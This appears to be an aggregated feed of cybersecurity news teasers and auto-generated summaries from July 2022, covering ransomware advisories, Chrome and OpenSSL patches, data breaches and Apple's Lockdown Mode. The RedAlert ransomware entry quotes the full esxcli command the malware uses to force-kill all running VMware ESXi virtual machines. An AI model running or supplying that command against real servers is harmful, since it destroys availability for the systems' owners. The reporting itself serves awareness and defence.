                2022-07-07 https://www.computerworld.com/article/3666688/apple-slaps-hard-against-mercenary-surveillance-as-a-service-industry.html#tk.rss_security

                Apple has struck a big blow against the mercenary “surveillance-as-a-service” industry, introducing a new, highly secure Lockdown Mode to protect individuals at the greatest risk of targeted attacks. The company is also offering millions of dollars to support research to expose such threats.

                Starting in iOS 16, iPadOS 16 and macOS Ventura, and available now in the latest developer-only betas, Lockdown Mode hardens security defenses and limits the functionalities sometimes abused by state-sponsored surveillance hackers. Apple describes this protection as “sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware.”

                Autosummary: “We congratulate [Apple] for providing protection to human rights defenders, heads of state, lawyers, activists, journalists, and more,” tweeted the EFF, a privacy advocacy group. Apple is also making a $10 million grant, plus any damages awarded from the lawsuit it is pursuing against NSO Group, to support organizations that investigate, expose, and prevent highly targeted cyberattacks, including those created by private companies developing state-sponsored mercenary spyware. Victims have included journalists, politicians, civil society advocates, activists, and diplomats, so while the numbers are small, the chilling impact of such surveillance is vast. Ford Foundation Tech and Society Program director Lori McGlinchey said: “The global spyware trade targets human rights defenders, journalists, and dissidents; it facilitates violence, reinforces authoritarianism, and supports political repression.” “Apple’s newly released Lockdown Mode will reduce the attack surface, increase costs for spyware firms, and thus make it much harder for repressive governments to hack high-risk users,” said John Scott-Railton, senior researcher at the Citizen Lab at the University of Toronto's Munk School of Global Affairs and Public Policy.


                North Korea-linked APTs use Maui Ransomware to target the Healthcare industry

                exploits ransomware industry
                2022-07-07 https://securityaffairs.co/wordpress/132978/malware/maui-ransomware-joint-alert.html

                US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warns of North-Korea-linked threat actors using Maui ransomware in attacks aimed at organizations in the Healthcare sector. “The Federal Bureau of […]

                The post North Korea-linked APTs use Maui Ransomware to target the Healthcare industry appeared first on Security Affairs.

                "

                Autosummary: "


                Fake copyright complaints push IcedID malware using Yandex Forms

                exploits
                2022-07-07 https://www.bleepingcomputer.com/news/security/fake-copyright-complaints-push-icedid-malware-using-yandex-forms/
                [...]

                Autosummary: Best regards, Christian Brdakic Legal Officer zoho, Inc. zoho.com 07/06/2022" However, what was different with this campaign is that instead of using Google Drive or Google Sites to host their alleged "reports" like they did in the past, the threat actors are now using Yandex Forms.


                New stealthy OrBit malware steals data from Linux devices

                exploits
                2022-07-07 https://www.bleepingcomputer.com/news/linux/new-stealthy-orbit-malware-steals-data-from-linux-devices/
                A newly discovered Linux malware is being used to stealthily steal information from backdoored Linux systems and infect all running processes on the machine. [...]

                Autosummary: "The malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands," Intezer Labs security researcher Nicole Fishbein explained.


                Atera integrates with Malwarebytes to protect organizations against ransomware attacks

                exploits ransomware
                2022-07-07 https://www.helpnetsecurity.com/2022/07/08/atera-malwarebytes/

                Atera announced a new integration with Malwarebytes, a provider of real-time cyber protection. Atera is the first remote management company to offer an integration that automates licensing and provisioning of the Malwarebytes OneView platform. This partnership plays an integral role for Atera to provide streamlined and maximized security operations for its community of more than 10,000 customers across 105 countries. “With workplaces continuing to evolve and employees working from anywhere in the world, the risk … More

                The post Atera integrates with Malwarebytes to protect organizations against ransomware attacks appeared first on Help Net Security.

                "

                Autosummary: "


                Hive Ransomware Upgrades to Rust for More Sophisticated Encryption Method

                exploits ransomware
                2022-07-06 https://thehackernews.com/2022/07/hive-ransomware-upgrades-to-rust-for.html
                The operators of the Hive ransomware-as-a-service (RaaS) scheme have overhauled their file-encrypting software to fully migrate to Rust and adopt a more sophisticated encryption method. "With its latest variant carrying several major upgrades, Hive also proves it's one of the fastest evolving ransomware families, exemplifying the continuously changing ransomware ecosystem," Microsoft Threat


                CISA and NPower offer free entry-level cybersecurity training

                ciber
                2022-07-06 https://www.helpnetsecurity.com/2022/07/06/free-cybersecurity-training-us/

                NPower, a US-based non-profit participating in a cybersecurity workforce development program started by the Cybersecurity and Infrastructure Agency (CISA), is looking for recruits for a free cybersecurity training program aimed at underserved populations in the US, including women, people of color, young adults, and military veterans and their spouses. The program is part of CISA’s wider effort to address the cyber workforce shortage in the short and long term. We’ve asked Nelson Abbott, Senior Director … More

                The post CISA and NPower offer free entry-level cybersecurity training appeared first on Help Net Security.

                "

                Autosummary: NPower, a US-based non-profit participating in a cybersecurity workforce development program started by the Cybersecurity and Infrastructure Agency (CISA), is looking for recruits for a free cybersecurity training program aimed at underserved populations in the US, including women, people of color, young adults, and military veterans and their spouses.Trainees gain an understanding of the basic theories of cybersecurity, as well as hands-on experience with many of the tools that are used by cyber professionals (Linux, NMap, Wireshark, Metasploit, Webgoat, FoxyProxy, etc). The program is offered nationally to candidates that reside in or near the regions we currently operate in: New York/New Jersey, Maryland, Michigan, Missouri, Texas and California. We’ve asked Nelson Abbott, Senior Director of Advanced Program Operations at NPower, and Chris Starling, a US Marine Corps veteran and Assistant VP at NPower California, to tell us more about it. "


                Bitter APT Hackers Continue to Target Bangladesh Military Entities

                ransomware
                2022-07-06 https://thehackernews.com/2022/07/bitter-apt-hackers-continue-to-target.html
                Military entities located in Bangladesh continue to be at the receiving end of sustained cyberattacks by an advanced persistent threat tracked as Bitter. "Through malicious document files and intermediate malware stages the threat actors conduct espionage by deploying Remote Access Trojans," cybersecurity firm SECUINFRA said in a new write-up published on July 5. The findings from the


                New Hive ransomware variant is written in Rust and uses an improved encryption method

                exploits ransomware
                2022-07-06 https://securityaffairs.co/wordpress/132914/malware/hive-ransomware-new-variant.html

                Hive ransomware operators have improved their file-encrypting module by migrating to Rust language and adopting a more sophisticated encryption method. The operators of the Hive ransomware upgraded their malware by migrating the malware to the Rust language and implementing a more sophisticated encryption method, Microsoft researchers warn. “The upgrades in the latest variant are effectively […]

                The post New Hive ransomware variant is written in Rust and uses an improved encryption method appeared first on Security Affairs.

                Autosummary: The porting to Rust language provides the following advantages: it offers memory, data type, and thread safety; it has deep control over low-level resources; it has a user-friendly syntax; it has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption; it has a good variety of cryptographic libraries; and it is relatively more difficult to reverse-engineer. The most important change in the latest Hive variant is the encryption mechanism it adopts.


                Marriott confirms data breach and a failed extortion attempt

                financial industry
                2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-confirms-data-breach-and-a-failed-extortion-attempt/
                Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...]

                Autosummary: Data breach affected 300-400 individuals. While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information.


                US govt warns of Maui ransomware attacks against healthcare orgs

                exploits ransomware
                2022-07-06 https://www.bleepingcomputer.com/news/security/us-govt-warns-of-maui-ransomware-attacks-against-healthcare-orgs/
                The FBI, CISA, and the U.S. Treasury Department issued today a joint advisory warning of North-Korean-backed threat actors using Maui ransomware in attacks against Healthcare and Public Health (HPH) organizations. [...]


                Discord Shame channel goes phishing

                financial
                2022-07-06 https://blog.malwarebytes.com/scams/2022/07/discord-shame-channel-goes-phishing/

                We take a look at reports that a Discord channel is being used to scare users into handing over login credentials.

                The post Discord Shame channel goes phishing appeared first on Malwarebytes Labs.

                "

                Autosummary: Choose from “Everyone”, “Friends of friends”, and “Server members”. Discord itself warned users over two years ago to only scan QR codes taken directly from their browser, and to not use codes sent by other users. "


                Google to delete location data of trips to abortion clinics

                industry
                2022-07-06 https://blog.malwarebytes.com/privacy-2/2022/07/google-to-delete-location-data-of-trips-to-abortion-clinics/

                Google upped its privacy efforts by deleting location history of visits to abortion clinics.

                The post Google to delete location data of trips to abortion clinics appeared first on Malwarebytes Labs.

                Autosummary: These include abortion clinics, addiction treatment facilities, counseling centers, domestic violence shelters, fertility centers, and other places deemed as sensitive locations.


                AA22-187A: North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector

                exploits government ransomware
                2022-07-06 https://us-cert.cisa.gov/ncas/alerts/aa22-187a
                Original release date: July 6, 2022

                Summary

                The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury (Treasury) are releasing this joint Cybersecurity Advisory (CSA) to provide information on Maui ransomware, which has been used by North Korean state-sponsored cyber actors since at least May 2021 to target Healthcare and Public Health (HPH) Sector organizations.

                This joint CSA provides information—including tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs)—on Maui ransomware obtained from FBI incident response activities and industry analysis of a Maui sample. The FBI, CISA, and Treasury urge HPH Sector organizations as well as other critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from ransomware operations. Victims of Maui ransomware should report the incident to their local FBI field office or CISA. 

                The FBI, CISA, and Treasury highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks. Note: in September 2021, Treasury issued an updated advisory highlighting the sanctions risks associated with ransomware payments and the proactive steps companies can take to mitigate such risks. Specifically, the updated advisory encourages U.S. entities to adopt and improve cybersecurity practices and report ransomware attacks to, and fully cooperate with, law enforcement. The updated advisory states that when affected parties take these proactive steps, Treasury’s Office of Foreign Assets Control (OFAC) would be more likely to resolve apparent sanctions violations involving ransomware attacks with a non-public enforcement response.

                For more information on state-sponsored North Korean maliciou

                Autosummary: Mitigations: The FBI, CISA, and Treasury urge HPH Sector organizations to limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks. In addition, the FBI, CISA, and Treasury urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents. Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom. Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and Treasury urge you to promptly report ransomware incidents to the FBI at a local FBI Field Office, CISA at us-cert.cisa.gov/report, or the USSS at a USSS Field Office. For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and, in some cases, the media. Request for Information: The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services.


                OpenSSL Releases Patch for High-Severity Bug that Could Lead to RCE Attacks

                exploits
                2022-07-06 https://thehackernews.com/2022/07/openssl-releases-patch-for-high.html
                The maintainers of the OpenSSL project have released patches to address a high-severity bug in the cryptographic library that could potentially lead to remote code execution under certain scenarios. The issue, now assigned the identifier CVE-2022-2274, has been described as a case of heap memory corruption with RSA private key operation that was introduced in OpenSSL version 3.0.4 released on


                IT services giant SHI hit by "professional malware attack"

                exploits
                2022-07-06 https://www.bleepingcomputer.com/news/security/it-services-giant-shi-hit-by-professional-malware-attack/
                SHI International Corp, a New Jersey-based provider of Information Technology (IT) products and services, has confirmed that its network was hit by a malware attack over the weekend. [...]


                Apple’s new Lockdown Mode defends against government spyware

                government
                2022-07-06 https://www.bleepingcomputer.com/news/apple/apple-s-new-lockdown-mode-defends-against-government-spyware/
                Apple announced that a new security feature known as Lockdown Mode will roll out with iOS 16, iPadOS 16, and macOS Ventura to protect high-risk individuals like human rights defenders, journalists, and dissidents against targeted spyware attacks. [...]

                Autosummary: Since December 2021, NSO Group spyware was also found deployed on iPhones belonging to Catalan politicians, journalists, and activists, Finnish diplomats, UK government employees, and U.S. Department of State employees.


                Ransomware, hacking groups move from Cobalt Strike to Brute Ratel

                exploits
                2022-07-06 https://www.bleepingcomputer.com/news/security/ransomware-hacking-groups-move-from-cobalt-strike-to-brute-ratel/
                Hacking groups and ransomware operations are moving away from Cobalt Strike to the newer Brute Ratel post-exploitation toolkit to evade detection by EDR and antivirus solutions. [...]

                Autosummary: Hackers switch to Brute Ratel: In 2020, Chetan Nayak, an ex-red teamer at Mandiant and CrowdStrike, released Brute Ratel Command and Control Center (BRc4) as an alternative to Cobalt Strike for red team penetration testing engagements. (Image caption: Windows shortcut disguised as CV to launch a program. Source: BleepingComputer.) While OneDriveUpdater.exe is a legitimate Microsoft executable, the included version.dll that is loaded by the program has been modified to act as a loader for a Brute Ratel badger, which is loaded into the RuntimeBroker.exe process.


                Marriott hit by new data breach and a failed extortion attempt

                financial industry
                2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-hit-by-new-data-breach-and-a-failed-extortion-attempt/
                Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...]

                Autosummary: Data breach affected 300-400 individuals: While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information.


                8 common Facebook Marketplace scams and how to avoid them

                financial
                2022-07-06 https://www.welivesecurity.com/2022/07/06/8-common-facebook-marketplace-scams-how-avoid/

                Here’s what to watch out for when buying or selling stuff on the online marketplace and how to tell if you’re being scammed

                The post 8 common Facebook Marketplace scams and how to avoid them appeared first on WeLiveSecurity

                "

                Autosummary: As the cost-of-living crisis bites, more users than ever will be turning to online platforms like Facebook Marketplace to get hold of goods at discounted rates. In so doing, it’s become a giant of the consumer-to-consumer space, allowing individual Facebook users to buy from and sell to each other seamlessly. Of course, much of the commerce on this “classified-ad section” of Facebook is legitimate, but like any other online marketplace, it also attracts plenty of scammers. How to spot a Facebook Marketplace scam: As with any kind of online fraud, the key for internet users is to remain sceptical and alert. Check the original price of items, and if there is a significant gulf between this and the for-sale price, be alert to the fact it may be counterfeit, stolen, defective, etc.


                Cyberattacks against law enforcement are on the rise

                ciber
                2022-07-06 https://securityaffairs.co/wordpress/132929/cyber-crime/cyberattacks-against-law-enforcement.html

                Experts observed an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Threat actors are hacking email and other accounts which belong […]

                The post Cyberattacks against law enforcement are on the rise appeared first on Security Affairs.

                "

                Autosummary: The most typical scenarios involving attacks on law enforcement systems include: Protest Activity (15%), Unauthorized Access (25%), Cyberespionage (40%), Law Enforcement Systems and Applications Abuse (8%), and Data Theft (12%). Based on the published research, such malicious activity is especially visible in countries of Latin America, South-East Asia, and offshore jurisdictions.


                Marriott International suffered a new data breach, attackers stole 20GB of data

                financial industry
                2022-07-06 https://securityaffairs.co/wordpress/132943/data-breach/marriott-new-data-breach.html

                Hotel chain Marriott International suffered a new data breach, a threat actor has stolen 20GB from the company. Hotel chain Marriott International confirmed it has suffered a new data breach after a threat actor stole 20GB of files from one of its properties. The attacker compromised the network at the BWI Airport Marriott Maryland  (BWIA), […]

                The post Marriott International suffered a new data breach, attackers stole 20GB of data appeared first on Security Affairs.

                "

                Autosummary: “Marriott acknowledged that while most of the data acquired by GNN was what Marriott described as non-sensitive internal business files, they will be notifying approximately 300-400 individuals and any regulators, as required.”


                Marriott confirms another data breach after hotel got hacked

                financial industry
                2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-confirms-another-data-breach-after-hotel-got-hacked/
                Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...]

                Autosummary: Data breach affected 300-400 individuals: While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information.


                Cybersecurity is driving digital transformation in alternative investment institutions

                ciber
                2022-07-05 https://www.helpnetsecurity.com/2022/07/05/cybersecurity-digital-transformation-alternative-investment-institutions/

                As the alternative investment industry tackles a rapidly changing threat landscape, increased regulation, and a continuous need to innovate, most firms are increasing their DX and security budgets and cite security as critically important to their DX initiatives, according to IDC. Senior leaders from 400 global alternative investment institutions in U.S., Canada, France, U.K., and Germany were surveyed to understand the current state of digital transformation and cybersecurity, identify key barriers and benefits of an … More

                The post Cybersecurity is driving digital transformation in alternative investment institutions appeared first on Help Net Security.

                "

                Autosummary: "


                Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild

                exploits
                2022-07-05 https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html
                Google on Monday shipped security updates to address a high-severity zero-day vulnerability in its Chrome web browser that it said is being exploited in the wild. The shortcoming, tracked as CVE-2022-2294, relates to a heap overflow flaw in the WebRTC component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native


                Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web

                exploits ransomware
                2022-07-05 https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html
                Cybersecurity researchers have detailed the various measures ransomware actors have taken to obscure their true identity online as well as the hosting location of their web server infrastructure. "Most ransomware operators use hosting providers outside their country of origin (such as Sweden, Germany, and Singapore) to host their ransomware operations sites," Cisco Talos researcher Paul Eubanks

                Autosummary: While ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify "public IP addresses hosting the same threat actor infrastructure as those on the dark web." "The methods we used to identify the public internet IPs involved matching threat actors' [self-signed] TLS certificate serial numbers and page elements with those indexed on the public internet," Eubanks said.


                AstraLocker ransomware operators shut down their operations

                exploits ransomware
                2022-07-05 https://securityaffairs.co/wordpress/132871/malware/astralocker-ransomware-shut-down.html

                AstraLocker ransomware operators told BleepingComputer they’re shutting down their operations and are releasing decryptors. AstraLocker ransomware operators told BleepingComputer they’re shutting down the operation and provided decryptors to the VirusTotal malware analysis platform. AstraLocker is based on the source code of the Babuk Locker (Babyk) ransomware that was leaked online in June 2021. BleepingComputer tested the […]

                The post AstraLocker ransomware operators shut down their operations appeared first on Security Affairs.

                "

                Autosummary: "


                Are banks quietly refusing reimbursements to fraud victims?

                financial
                2022-07-05 https://www.computerworld.com/article/3664808/are-banks-quietly-refusing-reimbursements-to-fraud-victims.html#tk.rss_security
                "

                Autosummary: Some quick background: Many of the issues here are similar to the major credit card brands’ (MasterCard, Visa, American Express, Discover, etc.). Other than a ruling that they could, maybe, get reimbursed for the time spent cleaning up the mess, few companies suffered sufficient out-of-pocket losses to make a trip to civil court worthwhile or even likely to succeed.


                Latest Cyberattack Against Iran Part of Ongoing Campaign

                ciber
                2022-07-05 https://threatpost.com/cyberattack-iran-campaign/180122/
                Iran"s steel manufacturing industry is victim to ongoing cyberattacks that previously impacted the country"s rail system. "

                Autosummary: The overlaps in the code, combined with contextual clues and even recycled jokes, indicate that the same threat actor, dubbed Indra, is behind the attacks impacting Iran’s infrastructure. "


                Google Patches Actively Exploited Chrome Bug

                exploits
                2022-07-05 https://threatpost.com/actively-exploited-chrome-bug/180118/
                The heap buffer overflow issue in the browser’s WebRTC engine could allow attackers to execute arbitrary code.

                Autosummary: Other Fixes: In addition to fixing the zero-day buffer overflow flaw, the Chrome releases also patch a type confusion flaw in the V8 JavaScript engine tracked as CVE-2022-2295 and reported June 16 by researchers “avaue” and “Buff3tts” at S.S.L., according to the post.


                Threat actors compromised British Army’s Twitter, YouTube accounts to promote crypto scams

                financial
                2022-07-05 https://securityaffairs.co/wordpress/132876/hacking/british-army-accounts-hacked.html

                Threat actors compromised the Twitter and YouTube accounts of the British Army to promote online crypto scams. The Twitter and YouTube accounts of the British Army were used to promote NFT and other crypto scams. The YouTube account was used to transmit an older Elon Musk clip that attempts to trick users into visiting cryptocurrency scam […]

                The post Threat actors compromised British Army’s Twitter, YouTube accounts to promote crypto scams appeared first on Security Affairs.

                "

                Autosummary: Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Microsoft quietly fixes ShadowCoerce Windows NTLM Relay bug

                exploits
                2022-07-05 https://www.bleepingcomputer.com/news/microsoft/microsoft-quietly-fixes-shadowcoerce-windows-ntlm-relay-bug/
                Microsoft has confirmed it fixed a previously disclosed "ShadowCoerce" vulnerability as part of the June 2022 updates that enabled attackers to target Windows servers in NTLM relay attacks. [...]

                Autosummary: NTLM relay attacks and mitigations: To coerce a remote server to authenticate against a malicious NTLM relay, threat actors could use various methods, including the MS-RPRN and the MS-EFSRPC (PetitPotam) protocols.


                Cloud-based malware is on the rise. How can you secure your business?

                exploits
                2022-07-05 https://blog.malwarebytes.com/business-2/2022/07/cloud-based-malware-is-on-the-rise-how-can-you-secure-your-business/

                Cloud-based malware is on the rise. In this post, we’ll cover four ways you can help secure your business against cloud-based malware.

                The post Cloud-based malware is on the rise. How can you secure your business? appeared first on Malwarebytes Labs.

                "

                Autosummary: Prevent cloud-based malware from getting a hold on your organization: Cloud-based malware is one of many threats to cloud security that businesses should address, and since cloud providers operate under a shared responsibility model, you need to have a game plan ready in the case of a cloud-based malware attack.
                3. Use a second-opinion cloud storage scanner to detect cloud-based malware: Even if you have fixed all the holes in your cloud security and use a top-notch EDR product, the reality is that malware can still make it through to the cloud, and that’s why regular cloud storage scanning is so important.
                4. Have a data backup strategy in place: The worst case scenario: You’ve properly configured your cloud, secured all your endpoints, and regularly scan your cloud storage, yet cloud-based malware still manages to slip past your defenses and encrypt all your files.


                Update now! Chrome patches ANOTHER zero-day vulnerability

                exploits
                2022-07-05 https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/07/update-now-chrome-patches-another-zero-day-vulnerability/

                Google has patched a vulnerability in Chrome which was being exploited in the wild. Make sure you’re using the latest version.

                The post Update now! Chrome patches ANOTHER zero-day vulnerability appeared first on Malwarebytes Labs.

                "

                Autosummary: CVE-2022-2294 is a high severity heap-based buffer overflow weakness in the Web Real-Time Communications (WebRTC) component which is being exploited in the wild. WebRTC supports video, voice, and generic data to be sent between peers, allowing developers to build powerful voice- and video-communication solutions.


                Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro

                ciber
                2022-07-05 https://securityaffairs.co/wordpress/132897/hacking/tel-aviv-metro-company-attacked.html

                Iran’s Fars News Agency reported that a massive cyberattack hit operating systems and servers of the Tel Aviv Metro. Iran’s Fars News Agency reported on Monday that operating systems and servers of the Tel Aviv Metro were hit by a massive cyberattack. The rail system is still under construction and according to The Jerusalem Post, […]

                The post Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro appeared first on Security Affairs.

                "

                Autosummary: "


                Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflict

                financial
                2022-07-05 https://securityaffairs.co/wordpress/132891/cyber-crime/cyber-police-of-ukraine-phishing.html

                The Cyber Police of Ukraine arrested nine members of a cybercriminal gang that has stolen 100 million hryvnias via phishing attacks. The Cyber Police of Ukraine arrested nine members of a cybercriminal organization that stole 100 million hryvnias via phishing attacks. The crooks created more than 400 phishing sites for obtaining the banking data of […]

                The post Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflict appeared first on Security Affairs.

                "

                Autosummary: 361 (Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks) of the Criminal Code of Ukraine.


                New RedAlert Ransomware targets Windows, Linux VMware ESXi servers

                exploits ransomware
                2022-07-05 https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/
                A new ransomware operation called RedAlert, or N13V, encrypts both Windows and Linux VMware ESXi servers in attacks on corporate networks. [...]

                Autosummary: When running the ransomware with the "-w" argument, the Linux encryptor will shut down all running VMware ESXi virtual machines using the following esxcli command: esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list | tail -n +2 | awk -F $',' '{system("esxcli vm process kill --type=force --world-id=" $1)}' When encrypting files, the ransomware utilizes the NTRUEncrypt public-key encryption algorithm, which supports various "Parameter Sets" that offer different levels of security.


                MetricStream appoints Gaurav Kapoor and Prasad Sabbineni as Co-CEOs

                industry
                2022-07-05 https://www.helpnetsecurity.com/2022/07/06/metricstream-gaurav-kapoor-prasad-sabbineni/

                MetricStream announced that Gaurav Kapoor and Prasad Sabbineni have been appointed as co-Chief Executive Officers. MetricStream has grown consistently over the last decade to become an established market leader in the GRC space. Over the past two years, MetricStream benefited from Bruce Dahlgren’s leadership as CEO by expanding the go-to-market with fresh branding, a simplified product portfolio, strategic partnerships, and accelerated GRC SaaS leadership. Last quarter, Dahlgren moved to an advisory role and helped transition … More

                The post MetricStream appoints Gaurav Kapoor and Prasad Sabbineni as Co-CEOs appeared first on Help Net Security.

                "

                Autosummary: He oversaw technology for enterprise GRC functions of Risk Management, Compliance, Internal Audit, Information Security, Third-Party Management as well as Finance, Treasury, HR, and Data across the entire bank globally at Citi.


                Is the UK government prepared for its greatest threat?

                government
                2022-07-04 https://www.helpnetsecurity.com/2022/07/04/uk-government-threat/

                Jen Easterly, the director of the US Cybersecurity and Infrastructure Security Agency (CISA), has warned the UK government that they could be the victim of a 9/11-style cyber-attack unless they face up to the “magnitude of the threat” posed by ransomware. In agreement with this, Steve Barclay, the UK government Minister responsible for cybersecurity, claims that “the greatest cyber threat to the UK – one now deemed severe enough to pose a national security threat … More

                The post Is the UK government prepared for its greatest threat? appeared first on Help Net Security.

                "

                Autosummary: With the percentage of nation-states passing legislation to regulate ransomware payments, fines, and negotiations expected to rise to 30% by the end of 2025, compared with less than 1% in 2021, this is clearly the beginning of awareness surrounding the devastating impact ransomware can have. In agreement with this, Steve Barclay, the UK government Minister responsible for cybersecurity, claims that “the greatest cyber threat to the UK – one now deemed severe enough to pose a national security threat – is from ransomware attacks.”


                HackerOne Employee Caught Stealing Vulnerability Reports for Personal Gains

                exploits
                2022-07-04 https://thehackernews.com/2022/07/hackerone-employee-caught-stealing.html
                Vulnerability coordination and bug bounty platform HackerOne on Friday disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain. "The person anonymously disclosed this vulnerability information outside the HackerOne platform with the goal of claiming additional bounties," it said. "In under 24 hours, we worked quickly to contain the


                Django fixes SQL Injection vulnerability in new releases

                exploits
                2022-07-04 https://www.bleepingcomputer.com/news/security/django-fixes-sql-injection-vulnerability-in-new-releases/
                Django, an open source Python-based web framework, has patched a high severity vulnerability in its latest releases. Tracked as CVE-2022-34265, the potential SQL Injection vulnerability impacts Django’s main branch, and versions 4.1 (currently in beta), 4.0, and 3.2, with patches and new releases issued fixing the vulnerability. [...]

                Autosummary: Patches to resolve the issue have been applied to Django’s main branch and to the 4.1, 4.0, and 3.2 release branches.


                Official British Army Twitter and YouTube accounts hijacked by NFT scammers

                financial
                2022-07-04 https://www.bitdefender.com/blog/hotforsecurity/official-british-army-twitter-and-youtube-accounts-hijacked-by-nft-scammers/
                Hundreds of thousands of people who follow the official social media accounts of the British Army may have been surprised to see that it had been hijacked by hackers on Sunday. Read more in my article on the Hot for Security blog.


                Unfaithful HackerOne employee steals bug reports to claim additional bounties

                exploits
                2022-07-04 https://securityaffairs.co/wordpress/132846/cyber-crime/hackerone-incident.html

                Bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports submitted to claim additional bounties. The vulnerability coordination and bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports submitted by white-hat hackers to claim additional bounties. The investigation started on June 22nd, 2022, when a customer asked the […]

                The post Unfaithful HackerOne employee steals bug reports to claim additional bounties appeared first on Security Affairs.

                "

                Autosummary: The company announced a series of additional improvements, such as implementing additional logging processes to improve incident response, implementing data isolation to reduce the “blast radius,” planning additional red teaming activities, and enhancing processes to identify anomalous access and proactively detect insider threats.


                UK Army’s Twitter, YouTube accounts hacked to push crypto scam

                financial
                2022-07-04 https://www.bleepingcomputer.com/news/security/uk-army-s-twitter-youtube-accounts-hacked-to-push-crypto-scam/
                British Army"s Twitter and YouTube accounts were hacked sometime yesterday and altered to promote online crypto scams. In a statement, UK"s Ministry of Defence confirms it is investigating the attack. [...] "

                Autosummary: Threat actors in control of the account then began tweeting and retweeting links to crypto scam sites: British Army verified Twitter account hacked and renamed to "pssssd" (Wayback Machine) Hackers are increasingly targeting verified Twitter accounts to conduct various nefarious activities—from scamming victims for money to sending fake account "suspension" notices, as reported by BleepingComputer this week. "


                Ukrainian Authorities Arrested Phishing Gang That Stole 100 Million UAH

                financial
                2022-07-04 https://thehackernews.com/2022/07/ukrainian-authorities-arrested-phishing.html
                The Cyber Police of Ukraine last week disclosed that it apprehended nine members of a criminal gang that embezzled 100 million hryvnias via hundreds of phishing sites that claimed to offer financial assistance to Ukrainian citizens as part of a campaign aimed at capitalizing on the ongoing conflict. "Criminals created more than 400 phishing links to obtain bank card data of citizens and


                AstraLocker ransomware shuts down and releases decryptors

                exploits ransomware
                2022-07-04 https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/
                The threat actor behind the lesser-known AstraLocker ransomware told BleepingComputer they’re shutting down the operation and plan to switch to cryptojacking. [...]

                Autosummary: The list of decryption tools released in the past includes Avaddon, Ragnarok, SynAck, TeslaCrypt, Crysis, AES-NI, Shade, FilesLocker, Ziggy, and FonixLocker.


                Google patches new Chrome zero-day flaw exploited in attacks

                exploits
                2022-07-04 https://www.bleepingcomputer.com/news/security/google-patches-new-chrome-zero-day-flaw-exploited-in-attacks/
                Google has released Chrome 103.0.5060.114 for Windows users to address a high-severity zero-day vulnerability exploited by attackers in the wild, the fourth Chrome zero-day patched in 2022. [...]

